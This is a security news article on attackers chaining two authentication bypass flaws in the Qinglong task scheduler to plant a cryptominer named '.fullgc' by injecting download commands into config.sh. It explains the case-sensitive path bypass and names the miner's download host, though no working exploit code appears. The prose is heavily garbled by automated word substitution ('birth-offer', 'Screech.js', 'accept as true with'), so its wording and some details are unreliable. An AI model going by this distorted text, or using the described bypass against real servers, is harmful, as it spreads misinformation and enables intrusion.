Blog Details

Hackers are exploiting two authentication bypass vulnerabilities in the Qinglong birth-offer task scheduling application to deploy cryptominers on builders’ servers.

Exploitation started in early February, before the protection complications accept as true with been disclosed publicly on the pause of the month, in step with researchers at cloud-native application security firm Snyk.

Qinglong is a self-hosted birth-offer time management platform popular among Chinese language builders. It has been forked extra than 3,200 cases and has over 19,000 stars on GitHub.

The two security complications impact Qinglong versions 2.20.1 and older and can also be chained to achieve far away code execution:

• CVE-2026-3965: A misconfigured rewrite rule maps ‘/birth/*’ requests to ‘/api/*’, unintentionally exposing safe admin endpoints by an unauthenticated route
• CVE-2026-4047: The authentication overview treats paths as case-sensitive (/api/), while the router fits them case-insensitively, allowing requests handle ‘/aPi/…’ to circumvent authentication and reach safe endpoints.

The root reason in both flaws is a mismatch between middleware authorization good judgment and Screech.js routing habits.

“Both vulnerabilities stem from a mismatch between the protection middleware’s assumptions and the framework’s habits,” Snyk researchers point to.

“The auth layer assumed sure URL patterns would always be handled one blueprint, while Screech.js treated them otherwise.”

Snyk experiences that attackers accept as true with been focusing on these two flaws on publicly exposed Qinglong panels to deploy cryptominers since February 7.

This task became first seen by Qinglong customers, who reported just a few rogue hidden process named ‘.fullgc’ utilizing between 85% and 100% of their CPU energy.

The name deliberately mimics “Fat GC,” an innocuous however resource-intensive process, to evade detection.

In line with Snyk, the attackers exploited the failings to change Qinglong’s config.sh and injected shell instructions that downloaded a miner to ‘/ql/files/db/.fullgc,’ and done it in the background.

The far away resource positioned at ‘file.551911.xyz’ hosted just a few variants of the binary, along side for Linux x86_64, ARM64, and macOS.

The assaults persevered with just a few confirmed infections all over assorted setups, along side in the support of Nginx and SSL, while the Qinglong maintainers only responded to the difficulty on March 1.

The maintainer acknowledged the vulnerability and entreated customers to set up basically the most up to date replace. On the opposite hand, the mitigation in pull liberate #2924 thinking about blockading relate injection patterns, which Snyk says became insufficient.

The researchers impart that the effective repair came in PR #2941, which corrected the authentication bypass in the middleware.